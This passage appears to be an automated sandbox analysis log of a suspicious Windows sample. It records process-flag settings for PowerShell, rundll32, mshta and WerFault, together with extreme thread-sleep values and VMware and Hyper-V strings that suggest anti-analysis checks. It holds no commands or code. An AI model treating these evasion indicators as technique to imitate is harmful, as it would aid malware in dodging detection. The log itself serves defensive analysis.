Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5316Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4440Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5126
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4614
Source: C:\Windows\System32\loaddll64.exe TID: 2972Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -23980767295822402s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 5126 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 4614 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.8.drBinary or memory string: VMware
Source: mshta.exe, 0000000D.00000003.2045776255.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\NC
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
